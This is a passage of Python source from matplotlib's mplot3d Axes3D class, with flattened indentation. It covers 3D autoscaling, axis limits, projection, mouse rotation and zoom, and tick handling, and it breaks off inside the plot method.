renderer.vvec = self.vvec
renderer.eye = self.eye
renderer.get_axis_position = self.get_axis_position
# Calculate projection of collections and patches and zorder them.
# Make sure they are drawn above the grids.
zorder_offset = max(axis.get_zorder()
for axis in self._get_axis_list()) + 1
for i, col in enumerate(
sorted(self.collections,
key=lambda col: col.do_3d_projection(renderer),
reverse=True)):
col.zorder = zorder_offset + i
for i, patch in enumerate(
sorted(self.patches,
key=lambda patch: patch.do_3d_projection(renderer),
reverse=True)):
patch.zorder = zorder_offset + i
if self._axis3don:
# Draw panes first
for axis in self._get_axis_list():
axis.draw_pane(renderer)
# Then axes
for axis in self._get_axis_list():
axis.draw(renderer)
# Then rest
super().draw(renderer)
def get_axis_position(self):
vals = self.get_w_lims()
tc = self.tunit_cube(vals, self.M)
xhigh = tc[1][2] > tc[2][2]
yhigh = tc[3][2] > tc[2][2]
zhigh = tc[0][2] > tc[2][2]
return xhigh, yhigh, zhigh
def _on_units_changed(self, scalex=False, scaley=False, scalez=False):
"""
Callback for processing changes to axis units.
Currently forces updates of data limits and view limits.
"""
self.relim()
self.autoscale_view(scalex=scalex, scaley=scaley, scalez=scalez)
def update_datalim(self, xys, **kwargs):
pass
def get_autoscale_on(self):
"""
Get whether autoscaling is applied for all axes on plot commands
.. versionadded :: 1.1.0
This function was added, but not tested. Please report any bugs.
"""
return super().get_autoscale_on() and self.get_autoscalez_on()
def get_autoscalez_on(self):
"""
Get whether autoscaling for the z-axis is applied on plot commands
.. versionadded :: 1.1.0
This function was added, but not tested. Please report any bugs.
"""
return self._autoscaleZon
def set_autoscale_on(self, b):
"""
Set whether autoscaling is applied on plot commands
.. versionadded :: 1.1.0
This function was added, but not tested. Please report any bugs.
Parameters
----------
b : bool
"""
super().set_autoscale_on(b)
self.set_autoscalez_on(b)
def set_autoscalez_on(self, b):
"""
Set whether autoscaling for the z-axis is applied on plot commands
.. versionadded :: 1.1.0
This function was added, but not tested. Please report any bugs.
Parameters
----------
b : bool
"""
self._autoscaleZon = b
def set_zmargin(self, m):
"""
Set padding of Z data limits prior to autoscaling.
*m* times the data interval will be added to each
end of that interval before it is used in autoscaling.
accepts: float in range 0 to 1
.. versionadded :: 1.1.0
This function was added, but not tested. Please report any bugs.
"""
if m < 0 or m > 1 :
raise ValueError("margin must be in range 0 to 1")
self._zmargin = m
self.stale = True
def margins(self, *margins, x=None, y=None, z=None, tight=True):
"""
Convenience method to set or retrieve autoscaling margins.
signatures::
margins()
returns xmargin, ymargin, zmargin
::
margins(margin)
margins(xmargin, ymargin, zmargin)
margins(x=xmargin, y=ymargin, z=zmargin)
margins(..., tight=False)
All forms above set the xmargin, ymargin and zmargin
parameters. All keyword parameters are optional. A single
positional argument specifies xmargin, ymargin and zmargin.
Passing both positional and keyword arguments for xmargin,
ymargin, and/or zmargin is invalid.
The *tight* parameter
is passed to :meth:`autoscale_view`, which is executed after
a margin is changed; the default here is *True*, on the
assumption that when margins are specified, no additional
padding to match tick marks is usually desired. Setting
*tight* to *None* will preserve the previous setting.
Specifying any margin changes only the autoscaling; for example,
if *xmargin* is not None, then *xmargin* times the X data
interval will be added to each end of that interval before
it is used in autoscaling.
.. versionadded :: 1.1.0
This function was added, but not tested. Please report any bugs.
"""
if margins and x is not None and y is not None and z is not None:
raise TypeError('Cannot pass both positional and keyword '
'arguments for x, y, and/or z.')
elif len(margins) == 1:
x = y = z = margins[0]
elif len(margins) == 3:
x, y, z = margins
elif margins:
raise TypeError('Must pass a single positional argument for all '
'margins, or one for each margin (x, y, z).')
if x is None and y is None and z is None:
if tight is not True:
warnings.warn('ignoring tight=%r in get mode' % (tight,))
return self._xmargin, self._ymargin, self._zmargin
if x is not None:
self.set_xmargin(x)
if y is not None:
self.set_ymargin(y)
if z is not None:
self.set_zmargin(z)
self.autoscale_view(
tight=tight, scalex=(x is not None), scaley=(y is not None),
scalez=(z is not None)
)
def autoscale(self, enable=True, axis='both', tight=None):
"""
Convenience method for simple axis view autoscaling.
See :meth:`matplotlib.axes.Axes.autoscale` for full explanation.
Note that this function behaves the same, but for all
three axes. Therefore, 'z' can be passed for *axis*,
and 'both' applies to all three axes.
.. versionadded :: 1.1.0
This function was added, but not tested. Please report any bugs.
"""
if enable is None:
scalex = True
scaley = True
scalez = True
else:
if axis in ['x', 'both']:
self._autoscaleXon = scalex = bool(enable)
else:
scalex = False
if axis in ['y', 'both']:
self._autoscaleYon = scaley = bool(enable)
else:
scaley = False
if axis in ['z', 'both']:
self._autoscaleZon = scalez = bool(enable)
else:
scalez = False
self.autoscale_view(tight=tight, scalex=scalex, scaley=scaley,
scalez=scalez)
def auto_scale_xyz(self, X, Y, Z=None, had_data=None):
x, y, z = map(np.asarray, (X, Y, Z))
try:
x, y = x.flatten(), y.flatten()
if Z is not None:
z = z.flatten()
except AttributeError:
raise
        # This updates the bounding boxes to keep a record of the minimum
        # rectangular volume that holds the data.
self.xy_dataLim.update_from_data_xy(np.array([x, y]).T, not had_data)
if z is not None:
self.zz_dataLim.update_from_data_xy(np.array([z, z]).T, not had_data)
# Let autoscale_view figure out how to use this data.
self.autoscale_view()
def autoscale_view(self, tight=None, scalex=True, scaley=True,
scalez=True):
"""
Autoscale the view limits using the data limits.
See :meth:`matplotlib.axes.Axes.autoscale_view` for documentation.
Note that this function applies to the 3D axes, and as such
adds the *scalez* to the function arguments.
.. versionchanged :: 1.1.0
Function signature was changed to better match the 2D version.
*tight* is now explicitly a kwarg and placed first.
.. versionchanged :: 1.2.1
This is now fully functional.
"""
if not self._ready:
return
# This method looks at the rectangular volume (see above)
# of data and decides how to scale the view portal to fit it.
if tight is None:
# if image data only just use the datalim
_tight = self._tight or (
len(self.images) > 0
and len(self.lines) == len(self.patches) == 0)
else:
_tight = self._tight = bool(tight)
if scalex and self._autoscaleXon:
self._shared_x_axes.clean()
x0, x1 = self.xy_dataLim.intervalx
xlocator = self.xaxis.get_major_locator()
try:
x0, x1 = xlocator.nonsingular(x0, x1)
except AttributeError:
x0, x1 = mtransforms.nonsingular(x0, x1, increasing=False,
expander=0.05)
if self._xmargin > 0:
delta = (x1 - x0) * self._xmargin
x0 -= delta
x1 += delta
if not _tight:
x0, x1 = xlocator.view_limits(x0, x1)
self.set_xbound(x0, x1)
if scaley and self._autoscaleYon:
self._shared_y_axes.clean()
y0, y1 = self.xy_dataLim.intervaly
ylocator = self.yaxis.get_major_locator()
try:
y0, y1 = ylocator.nonsingular(y0, y1)
except AttributeError:
y0, y1 = mtransforms.nonsingular(y0, y1, increasing=False,
expander=0.05)
if self._ymargin > 0:
delta = (y1 - y0) * self._ymargin
y0 -= delta
y1 += delta
if not _tight:
y0, y1 = ylocator.view_limits(y0, y1)
self.set_ybound(y0, y1)
if scalez and self._autoscaleZon:
self._shared_z_axes.clean()
z0, z1 = self.zz_dataLim.intervalx
zlocator = self.zaxis.get_major_locator()
try:
z0, z1 = zlocator.nonsingular(z0, z1)
except AttributeError:
z0, z1 = mtransforms.nonsingular(z0, z1, increasing=False,
expander=0.05)
if self._zmargin > 0:
delta = (z1 - z0) * self._zmargin
z0 -= delta
z1 += delta
if not _tight:
z0, z1 = zlocator.view_limits(z0, z1)
self.set_zbound(z0, z1)
def get_w_lims(self):
'''Get 3D world limits.'''
minx, maxx = self.get_xlim3d()
miny, maxy = self.get_ylim3d()
minz, maxz = self.get_zlim3d()
return minx, maxx, miny, maxy, minz, maxz
def _determine_lims(self, xmin=None, xmax=None, *args, **kwargs):
if xmax is None and cbook.iterable(xmin):
xmin, xmax = xmin
if xmin == xmax:
xmin -= 0.05
xmax += 0.05
return (xmin, xmax)
def set_xlim3d(self, left=None, right=None, emit=True, auto=False,
*, xmin=None, xmax=None):
"""
Set 3D x limits.
See :meth:`matplotlib.axes.Axes.set_xlim` for full documentation.
"""
if right is None and cbook.iterable(left):
left, right = left
if xmin is not None:
cbook.warn_deprecated('3.0', name='`xmin`',
alternative='`left`', obj_type='argument')
if left is not None:
raise TypeError('Cannot pass both `xmin` and `left`')
left = xmin
if xmax is not None:
cbook.warn_deprecated('3.0', name='`xmax`',
alternative='`right`', obj_type='argument')
if right is not None:
raise TypeError('Cannot pass both `xmax` and `right`')
right = xmax
self._process_unit_info(xdata=(left, right))
left = self._validate_converted_limits(left, self.convert_xunits)
right = self._validate_converted_limits(right, self.convert_xunits)
old_left, old_right = self.get_xlim()
if left is None:
left = old_left
if right is None:
right = old_right
if left == right:
warnings.warn(('Attempting to set identical left==right results\n'
'in singular transformations; automatically expanding.\n'
'left=%s, right=%s') % (left, right))
left, right = mtransforms.nonsingular(left, right, increasing=False)
left, right = self.xaxis.limit_range_for_scale(left, right)
self.xy_viewLim.intervalx = (left, right)
if auto is not None:
self._autoscaleXon = bool(auto)
if emit:
self.callbacks.process('xlim_changed', self)
# Call all of the other x-axes that are shared with this one
for other in self._shared_x_axes.get_siblings(self):
if other is not self:
other.set_xlim(self.xy_viewLim.intervalx,
emit=False, auto=auto)
if (other.figure != self.figure and
other.figure.canvas is not None):
other.figure.canvas.draw_idle()
self.stale = True
return left, right
set_xlim = set_xlim3d
def set_ylim3d(self, bottom=None, top=None, emit=True, auto=False,
*, ymin=None, ymax=None):
"""
Set 3D y limits.
See :meth:`matplotlib.axes.Axes.set_ylim` for full documentation.
"""
if top is None and cbook.iterable(bottom):
bottom, top = bottom
if ymin is not None:
cbook.warn_deprecated('3.0', name='`ymin`',
alternative='`bottom`', obj_type='argument')
if bottom is not None:
raise TypeError('Cannot pass both `ymin` and `bottom`')
bottom = ymin
if ymax is not None:
cbook.warn_deprecated('3.0', name='`ymax`',
alternative='`top`', obj_type='argument')
if top is not None:
raise TypeError('Cannot pass both `ymax` and `top`')
top = ymax
self._process_unit_info(ydata=(bottom, top))
bottom = self._validate_converted_limits(bottom, self.convert_yunits)
top = self._validate_converted_limits(top, self.convert_yunits)
old_bottom, old_top = self.get_ylim()
if bottom is None:
bottom = old_bottom
if top is None:
top = old_top
if top == bottom:
warnings.warn(('Attempting to set identical bottom==top results\n'
'in singular transformations; automatically expanding.\n'
'bottom=%s, top=%s') % (bottom, top))
bottom, top = mtransforms.nonsingular(bottom, top, increasing=False)
bottom, top = self.yaxis.limit_range_for_scale(bottom, top)
self.xy_viewLim.intervaly = (bottom, top)
if auto is not None:
self._autoscaleYon = bool(auto)
if emit:
self.callbacks.process('ylim_changed', self)
# Call all of the other y-axes that are shared with this one
for other in self._shared_y_axes.get_siblings(self):
if other is not self:
other.set_ylim(self.xy_viewLim.intervaly,
emit=False, auto=auto)
if (other.figure != self.figure and
other.figure.canvas is not None):
other.figure.canvas.draw_idle()
self.stale = True
return bottom, top
set_ylim = set_ylim3d
def set_zlim3d(self, bottom=None, top=None, emit=True, auto=False,
*, zmin=None, zmax=None):
"""
Set 3D z limits.
See :meth:`matplotlib.axes.Axes.set_ylim` for full documentation
"""
if top is None and cbook.iterable(bottom):
bottom, top = bottom
if zmin is not None:
cbook.warn_deprecated('3.0', name='`zmin`',
alternative='`bottom`', obj_type='argument')
if bottom is not None:
raise TypeError('Cannot pass both `zmin` and `bottom`')
bottom = zmin
if zmax is not None:
cbook.warn_deprecated('3.0', name='`zmax`',
alternative='`top`', obj_type='argument')
if top is not None:
raise TypeError('Cannot pass both `zmax` and `top`')
top = zmax
self._process_unit_info(zdata=(bottom, top))
bottom = self._validate_converted_limits(bottom, self.convert_zunits)
top = self._validate_converted_limits(top, self.convert_zunits)
old_bottom, old_top = self.get_zlim()
if bottom is None:
bottom = old_bottom
if top is None:
top = old_top
if top == bottom:
warnings.warn(('Attempting to set identical bottom==top results\n'
'in singular transformations; automatically expanding.\n'
'bottom=%s, top=%s') % (bottom, top))
bottom, top = mtransforms.nonsingular(bottom, top, increasing=False)
bottom, top = self.zaxis.limit_range_for_scale(bottom, top)
self.zz_viewLim.intervalx = (bottom, top)
if auto is not None:
self._autoscaleZon = bool(auto)
if emit:
self.callbacks.process('zlim_changed', self)
# Call all of the other y-axes that are shared with this one
for other in self._shared_z_axes.get_siblings(self):
if other is not self:
other.set_zlim(self.zz_viewLim.intervalx,
emit=False, auto=auto)
if (other.figure != self.figure and
other.figure.canvas is not None):
other.figure.canvas.draw_idle()
self.stale = True
return bottom, top
set_zlim = set_zlim3d
def get_xlim3d(self):
return tuple(self.xy_viewLim.intervalx)
get_xlim3d.__doc__ = maxes.Axes.get_xlim.__doc__
get_xlim = get_xlim3d
if get_xlim.__doc__ is not None:
get_xlim.__doc__ += """
.. versionchanged :: 1.1.0
This function now correctly refers to the 3D x-limits
"""
def get_ylim3d(self):
return tuple(self.xy_viewLim.intervaly)
get_ylim3d.__doc__ = maxes.Axes.get_ylim.__doc__
get_ylim = get_ylim3d
if get_ylim.__doc__ is not None:
get_ylim.__doc__ += """
.. versionchanged :: 1.1.0
This function now correctly refers to the 3D y-limits.
"""
def get_zlim3d(self):
'''Get 3D z limits.'''
return tuple(self.zz_viewLim.intervalx)
get_zlim = get_zlim3d
def get_zscale(self):
"""
Return the zaxis scale string %s
.. versionadded :: 1.1.0
This function was added, but not tested. Please report any bugs.
""" % (", ".join(mscale.get_scale_names()))
return self.zaxis.get_scale()
# We need to slightly redefine these to pass scalez=False
# to their calls of autoscale_view.
def set_xscale(self, value, **kwargs):
self.xaxis._set_scale(value, **kwargs)
self.autoscale_view(scaley=False, scalez=False)
self._update_transScale()
if maxes.Axes.set_xscale.__doc__ is not None:
set_xscale.__doc__ = maxes.Axes.set_xscale.__doc__ + """
.. versionadded :: 1.1.0
This function was added, but not tested. Please report any bugs.
"""
def set_yscale(self, value, **kwargs):
self.yaxis._set_scale(value, **kwargs)
self.autoscale_view(scalex=False, scalez=False)
self._update_transScale()
self.stale = True
if maxes.Axes.set_yscale.__doc__ is not None:
set_yscale.__doc__ = maxes.Axes.set_yscale.__doc__ + """
.. versionadded :: 1.1.0
This function was added, but not tested. Please report any bugs.
"""
@docstring.dedent_interpd
def set_zscale(self, value, **kwargs):
"""
Set the scaling of the z-axis: %(scale)s
ACCEPTS: [%(scale)s]
Different kwargs are accepted, depending on the scale:
%(scale_docs)s
.. note ::
Currently, Axes3D objects only supports linear scales.
Other scales may or may not work, and support for these
is improving with each release.
.. versionadded :: 1.1.0
This function was added, but not tested. Please report any bugs.
"""
self.zaxis._set_scale(value, **kwargs)
self.autoscale_view(scalex=False, scaley=False)
self._update_transScale()
self.stale = True
def set_zticks(self, *args, **kwargs):
"""
Set z-axis tick locations.
See :meth:`matplotlib.axes.Axes.set_yticks` for more details.
.. note::
Minor ticks are not supported.
.. versionadded:: 1.1.0
"""
return self.zaxis.set_ticks(*args, **kwargs)
def get_zticks(self, minor=False):
"""
Return the z ticks as a list of locations
See :meth:`matplotlib.axes.Axes.get_yticks` for more details.
.. note::
Minor ticks are not supported.
.. versionadded:: 1.1.0
"""
return self.zaxis.get_ticklocs(minor=minor)
def get_zmajorticklabels(self):
"""
Get the ztick labels as a list of Text instances
.. versionadded :: 1.1.0
"""
return cbook.silent_list('Text zticklabel',
self.zaxis.get_majorticklabels())
def get_zminorticklabels(self):
"""
Get the ztick labels as a list of Text instances
.. note::
Minor ticks are not supported. This function was added
only for completeness.
.. versionadded :: 1.1.0
"""
return cbook.silent_list('Text zticklabel',
self.zaxis.get_minorticklabels())
def set_zticklabels(self, *args, **kwargs):
"""
Set z-axis tick labels.
See :meth:`matplotlib.axes.Axes.set_yticklabels` for more details.
.. note::
Minor ticks are not supported by Axes3D objects.
.. versionadded:: 1.1.0
"""
return self.zaxis.set_ticklabels(*args, **kwargs)
def get_zticklabels(self, minor=False):
"""
Get ztick labels as a list of Text instances.
See :meth:`matplotlib.axes.Axes.get_yticklabels` for more details.
.. note::
Minor ticks are not supported.
.. versionadded:: 1.1.0
"""
return cbook.silent_list('Text zticklabel',
self.zaxis.get_ticklabels(minor=minor))
def zaxis_date(self, tz=None):
"""
Sets up z-axis ticks and labels that treat the z data as dates.
*tz* is a timezone string or :class:`tzinfo` instance.
Defaults to rc value.
.. note::
This function is merely provided for completeness.
Axes3D objects do not officially support dates for ticks,
and so this may or may not work as expected.
.. versionadded :: 1.1.0
This function was added, but not tested. Please report any bugs.
"""
self.zaxis.axis_date(tz)
def get_zticklines(self):
"""
Get ztick lines as a list of Line2D instances.
Note that this function is provided merely for completeness.
These lines are re-calculated as the display changes.
.. versionadded:: 1.1.0
"""
return self.zaxis.get_ticklines()
def clabel(self, *args, **kwargs):
"""
This function is currently not implemented for 3D axes.
Returns *None*.
"""
return None
def view_init(self, elev=None, azim=None):
"""
Set the elevation and azimuth of the axes.
This can be used to rotate the axes programmatically.
'elev' stores the elevation angle in the z plane.
'azim' stores the azimuth angle in the x,y plane.
if elev or azim are None (default), then the initial value
is used which was specified in the :class:`Axes3D` constructor.
"""
self.dist = 10
if elev is None:
self.elev = self.initial_elev
else:
self.elev = elev
if azim is None:
self.azim = self.initial_azim
else:
self.azim = azim
def set_proj_type(self, proj_type):
"""
Set the projection type.
Parameters
----------
proj_type : str
Type of projection, accepts 'persp' and 'ortho'.
"""
if proj_type == 'persp':
self._projection = proj3d.persp_transformation
elif proj_type == 'ortho':
self._projection = proj3d.ortho_transformation
else:
raise ValueError("unrecognized projection: %s" % proj_type)
def get_proj(self):
"""
Create the projection matrix from the current viewing position.
elev stores the elevation angle in the z plane
azim stores the azimuth angle in the x,y plane
dist is the distance of the eye viewing point from the object
point.
"""
relev, razim = np.pi * self.elev/180, np.pi * self.azim/180
xmin, xmax = self.get_xlim3d()
ymin, ymax = self.get_ylim3d()
zmin, zmax = self.get_zlim3d()
# transform to uniform world coordinates 0-1.0,0-1.0,0-1.0
worldM = proj3d.world_transformation(xmin, xmax,
ymin, ymax,
zmin, zmax)
# look into the middle of the new coordinates
R = np.array([0.5, 0.5, 0.5])
xp = R[0] + np.cos(razim) * np.cos(relev) * self.dist
yp = R[1] + np.sin(razim) * np.cos(relev) * self.dist
zp = R[2] + np.sin(relev) * self.dist
E = np.array((xp, yp, zp))
self.eye = E
self.vvec = R - E
self.vvec = self.vvec / proj3d.mod(self.vvec)
if abs(relev) > np.pi/2:
# upside down
V = np.array((0, 0, -1))
else:
V = np.array((0, 0, 1))
zfront, zback = -self.dist, self.dist
viewM = proj3d.view_transformation(E, R, V)
projM = self._projection(zfront, zback)
M0 = np.dot(viewM, worldM)
M = np.dot(projM, M0)
return M
def mouse_init(self, rotate_btn=1, zoom_btn=3):
"""Initializes mouse button callbacks to enable 3D rotation of
the axes. Also optionally sets the mouse buttons for 3D rotation
and zooming.
============ =======================================================
Argument Description
============ =======================================================
*rotate_btn* The integer or list of integers specifying which mouse
button or buttons to use for 3D rotation of the axes.
Default = 1.
*zoom_btn* The integer or list of integers specifying which mouse
button or buttons to use to zoom the 3D axes.
Default = 3.
============ =======================================================
"""
self.button_pressed = None
canv = self.figure.canvas
if canv is not None:
c1 = canv.mpl_connect('motion_notify_event', self._on_move)
c2 = canv.mpl_connect('button_press_event', self._button_press)
c3 = canv.mpl_connect('button_release_event', self._button_release)
self._cids = [c1, c2, c3]
else:
warnings.warn(
"Axes3D.figure.canvas is 'None', mouse rotation disabled. "
"Set canvas then call Axes3D.mouse_init().")
# coerce scalars into array-like, then convert into
# a regular list to avoid comparisons against None
# which breaks in recent versions of numpy.
self._rotate_btn = np.atleast_1d(rotate_btn).tolist()
self._zoom_btn = np.atleast_1d(zoom_btn).tolist()
def can_zoom(self):
"""
Return *True* if this axes supports the zoom box button functionality.
3D axes objects do not use the zoom box button.
"""
return False
def can_pan(self):
"""
Return *True* if this axes supports the pan/zoom button functionality.
3D axes objects do not use the pan/zoom button.
"""
return False
def cla(self):
"""
Clear axes
"""
# Disabling mouse interaction might have been needed a long
# time ago, but I can't find a reason for it now - BVR (2012-03)
#self.disable_mouse_rotation()
super().cla()
self.zaxis.cla()
if self._sharez is not None:
self.zaxis.major = self._sharez.zaxis.major
self.zaxis.minor = self._sharez.zaxis.minor
z0, z1 = self._sharez.get_zlim()
self.set_zlim(z0, z1, emit=False, auto=None)
self.zaxis._set_scale(self._sharez.zaxis.get_scale())
else:
self.zaxis._set_scale('linear')
try:
self.set_zlim(0, 1)
except TypeError:
pass
self._autoscaleZon = True
self._zmargin = 0
self.grid(rcParams['axes3d.grid'])
def disable_mouse_rotation(self):
"""Disable mouse button callbacks.
"""
# Disconnect the various events we set.
for cid in self._cids:
self.figure.canvas.mpl_disconnect(cid)
self._cids = []
def _button_press(self, event):
if event.inaxes == self:
self.button_pressed = event.button
self.sx, self.sy = event.xdata, event.ydata
def _button_release(self, event):
self.button_pressed = None
def format_zdata(self, z):
"""
        Return *z* formatted as a string. This function will use the
:attr:`fmt_zdata` attribute if it is callable, else will fall
back on the zaxis major formatter
"""
try: return self.fmt_zdata(z)
except (AttributeError, TypeError):
func = self.zaxis.get_major_formatter().format_data_short
val = func(z)
return val
def format_coord(self, xd, yd):
"""
Given the 2D view coordinates attempt to guess a 3D coordinate.
Looks for the nearest edge to the point and then assumes that
the point is at the same z location as the nearest point on the edge.
"""
if self.M is None:
return ''
if self.button_pressed in self._rotate_btn:
return 'azimuth={:.0f} deg, elevation={:.0f} deg '.format(
self.azim, self.elev)
# ignore xd and yd and display angles instead
# nearest edge
p0, p1 = min(self.tunit_edges(),
key=lambda edge: proj3d.line2d_seg_dist(
edge[0], edge[1], (xd, yd)))
# scale the z value to match
x0, y0, z0 = p0
x1, y1, z1 = p1
d0 = np.hypot(x0-xd, y0-yd)
d1 = np.hypot(x1-xd, y1-yd)
dt = d0+d1
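        # Inverse-distance weighting along the nearest edge: the endpoint closer
        # to the cursor contributes more to the interpolated z value.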
z = d1/dt * z0 + d0/dt * z1
x, y, z = proj3d.inv_transform(xd, yd, z, self.M)
xs = self.format_xdata(x)
ys = self.format_ydata(y)
zs = self.format_zdata(z)
return 'x=%s, y=%s, z=%s' % (xs, ys, zs)
def _on_move(self, event):
"""Mouse moving
button-1 rotates by default. Can be set explicitly in mouse_init().
button-3 zooms by default. Can be set explicitly in mouse_init().
"""
if not self.button_pressed:
return
if self.M is None:
return
x, y = event.xdata, event.ydata
# In case the mouse is out of bounds.
if x is None:
return
dx, dy = x - self.sx, y - self.sy
w = self._pseudo_w
h = self._pseudo_h
self.sx, self.sy = x, y
# Rotation
if self.button_pressed in self._rotate_btn:
# rotate viewing point
# get the x and y pixel coords
if dx == 0 and dy == 0:
return
self.elev = art3d.norm_angle(self.elev - (dy/h)*180)
self.azim = art3d.norm_angle(self.azim - (dx/w)*180)
self.get_proj()
self.stale = True
self.figure.canvas.draw_idle()
# elif self.button_pressed == 2:
# pan view
# project xv,yv,zv -> xw,yw,zw
# pan
# pass
# Zoom
elif self.button_pressed in self._zoom_btn:
# zoom view
# hmmm..this needs some help from clipping....
minx, maxx, miny, maxy, minz, maxz = self.get_w_lims()
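            # df is the vertical mouse drag as a fraction of the axes height;
            # each axis interval is grown or shrunk by that fraction on both ends.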
df = 1-((h - dy)/h)
dx = (maxx-minx)*df
dy = (maxy-miny)*df
dz = (maxz-minz)*df
self.set_xlim3d(minx - dx, maxx + dx)
self.set_ylim3d(miny - dy, maxy + dy)
self.set_zlim3d(minz - dz, maxz + dz)
self.get_proj()
self.figure.canvas.draw_idle()
def set_zlabel(self, zlabel, fontdict=None, labelpad=None, **kwargs):
'''
Set zlabel. See doc for :meth:`set_ylabel` for description.
'''
if labelpad is not None : self.zaxis.labelpad = labelpad
return self.zaxis.set_label_text(zlabel, fontdict, **kwargs)
def get_zlabel(self):
"""
Get the z-label text string.
.. versionadded :: 1.1.0
This function was added, but not tested. Please report any bugs.
"""
label = self.zaxis.get_label()
return label.get_text()
#### Axes rectangle characteristics
def get_frame_on(self):
"""
Get whether the 3D axes panels are drawn.
.. versionadded :: 1.1.0
"""
return self._frameon
def set_frame_on(self, b):
"""
Set whether the 3D axes panels are drawn.
.. versionadded :: 1.1.0
Parameters
----------
b : bool
"""
self._frameon = bool(b)
self.stale = True
def grid(self, b=True, **kwargs):
'''
Set / unset 3D grid.
.. note::
Currently, this function does not behave the same as
:meth:`matplotlib.axes.Axes.grid`, but it is intended to
eventually support that behavior.
.. versionchanged :: 1.1.0
This function was changed, but not tested. Please report any bugs.
'''
# TODO: Operate on each axes separately
if len(kwargs):
b = True
self._draw_grid = cbook._string_to_bool(b)
self.stale = True
def ticklabel_format(
self, *, style='', scilimits=None, useOffset=None, axis='both'):
"""
Convenience method for manipulating the ScalarFormatter
        used by default for linear axes in Axes3D objects.
See :meth:`matplotlib.axes.Axes.ticklabel_format` for full
documentation. Note that this version applies to all three
axes of the Axes3D object. Therefore, the *axis* argument
will also accept a value of 'z' and the value of 'both' will
apply to all three axes.
.. versionadded :: 1.1.0
This function was added, but not tested. Please report any bugs.
"""
style = style.lower()
axis = axis.lower()
if scilimits is not None:
try:
m, n = scilimits
m+n+1 # check that both are numbers
except (ValueError, TypeError):
raise ValueError("scilimits must be a sequence of 2 integers")
if style[:3] == 'sci':
sb = True
elif style == 'plain':
sb = False
elif style == '':
sb = None
else:
raise ValueError("%s is not a valid style value")
try:
if sb is not None:
                if axis in ['both', 'x']:
                    self.xaxis.major.formatter.set_scientific(sb)
                if axis in ['both', 'y']:
                    self.yaxis.major.formatter.set_scientific(sb)
                if axis in ['both', 'z']:
                    self.zaxis.major.formatter.set_scientific(sb)
if scilimits is not None:
if axis in ['both', 'x']:
self.xaxis.major.formatter.set_powerlimits(scilimits)
if axis in ['both', 'y']:
self.yaxis.major.formatter.set_powerlimits(scilimits)
if axis in ['both', 'z']:
self.zaxis.major.formatter.set_powerlimits(scilimits)
if useOffset is not None:
if axis in ['both', 'x']:
self.xaxis.major.formatter.set_useOffset(useOffset)
if axis in ['both', 'y']:
self.yaxis.major.formatter.set_useOffset(useOffset)
if axis in ['both', 'z']:
self.zaxis.major.formatter.set_useOffset(useOffset)
except AttributeError:
raise AttributeError(
"This method only works with the ScalarFormatter.")
def locator_params(self, axis='both', tight=None, **kwargs):
"""
Convenience method for controlling tick locators.
See :meth:`matplotlib.axes.Axes.locator_params` for full
documentation. Note that this is for Axes3D objects,
therefore, setting *axis* to 'both' will result in the
parameters being set for all three axes. Also, *axis*
can also take a value of 'z' to apply parameters to the
z axis.
.. versionadded :: 1.1.0
This function was added, but not tested. Please report any bugs.
"""
_x = axis in ['x', 'both']
_y = axis in ['y', 'both']
_z = axis in ['z', 'both']
if _x:
self.xaxis.get_major_locator().set_params(**kwargs)
if _y:
self.yaxis.get_major_locator().set_params(**kwargs)
if _z:
self.zaxis.get_major_locator().set_params(**kwargs)
self.autoscale_view(tight=tight, scalex=_x, scaley=_y, scalez=_z)
def tick_params(self, axis='both', **kwargs):
"""
Convenience method for changing the appearance of ticks and
tick labels.
See :meth:`matplotlib.axes.Axes.tick_params` for more complete
documentation.
The only difference is that setting *axis* to 'both' will
mean that the settings are applied to all three axes. Also,
the *axis* parameter also accepts a value of 'z', which
would mean to apply to only the z-axis.
Also, because of how Axes3D objects are drawn very differently
from regular 2D axes, some of these settings may have
ambiguous meaning. For simplicity, the 'z' axis will
accept settings as if it was like the 'y' axis.
.. note::
While this function is currently implemented, the core part
of the Axes3D object may ignore some of these settings.
Future releases will fix this. Priority will be given to
those who file bugs.
.. versionadded :: 1.1.0
This function was added, but not tested. Please report any bugs.
"""
super().tick_params(axis, **kwargs)
if axis in ['z', 'both'] :
zkw = dict(kwargs)
zkw.pop('top', None)
zkw.pop('bottom', None)
zkw.pop('labeltop', None)
zkw.pop('labelbottom', None)
self.zaxis.set_tick_params(**zkw)
### data limits, ticks, tick labels, and formatting
def invert_zaxis(self):
"""
Invert the z-axis.
.. versionadded :: 1.1.0
This function was added, but not tested. Please report any bugs.
"""
bottom, top = self.get_zlim()
self.set_zlim(top, bottom, auto=None)
def zaxis_inverted(self):
'''
Returns True if the z-axis is inverted.
.. versionadded :: 1.1.0
This function was added, but not tested. Please report any bugs.
'''
bottom, top = self.get_zlim()
return top < bottom
def get_zbound(self):
"""
Returns the z-axis numerical bounds where::
lowerBound < upperBound
.. versionadded :: 1.1.0
This function was added, but not tested. Please report any bugs.
"""
bottom, top = self.get_zlim()
if bottom < top:
return bottom, top
else:
return top, bottom
def set_zbound(self, lower=None, upper=None):
"""
Set the lower and upper numerical bounds of the z-axis.
This method will honor axes inversion regardless of parameter order.
It will not change the :attr:`_autoscaleZon` attribute.
.. versionadded :: 1.1.0
This function was added, but not tested. Please report any bugs.
"""
if upper is None and cbook.iterable(lower):
lower,upper = lower
old_lower,old_upper = self.get_zbound()
if lower is None: lower = old_lower
if upper is None: upper = old_upper
if self.zaxis_inverted():
if lower < upper:
self.set_zlim(upper, lower, auto=None)
else:
self.set_zlim(lower, upper, auto=None)
else :
if lower < upper:
self.set_zlim(lower, upper, auto=None)
else :
self.set_zlim(upper, lower, auto=None)
def text(self, x, y, z, s, zdir=None, **kwargs):
'''
Add text to the plot. kwargs will be passed on to Axes.text,
except for the `zdir` keyword, which sets the direction to be
used as the z direction.
'''
text = super().text(x, y, s, **kwargs)
art3d.text_2d_to_3d(text, z, zdir)
return text
text3D = text
text2D = Axes.text
def plot(self, xs, ys, *args, zdir='z', **kwargs):
'''
Plot 2D or 3D data.
========== ================================================
Argument Description
========== ================================================
*xs*, *ys* x, y coordinates of vertices
*zs* z value(s), either one for all points or one for
each point.
*zdir* Which direction to use as z ('x', 'y' or 'z')
when plotting a 2D set.
========== ================================================
Other arguments are passed on to
:func:`~matplotlib.axes.Axes.plot`
'''
had_data = self.has_data()
# `zs` can be passed positionally or as keyword; checking whether
# args[0] is a string matches the behavior of 2D `plot` (via
# `_process_plot_var_args`).
if args and not isinstance(args[0], str):
zs = args[0]
args = args[1:]
if 'zs' in kwargs:
raise TypeError("plot() for multiple values for argument 'z'")
else:
zs = kwargs.pop('zs', 0)
# Match length
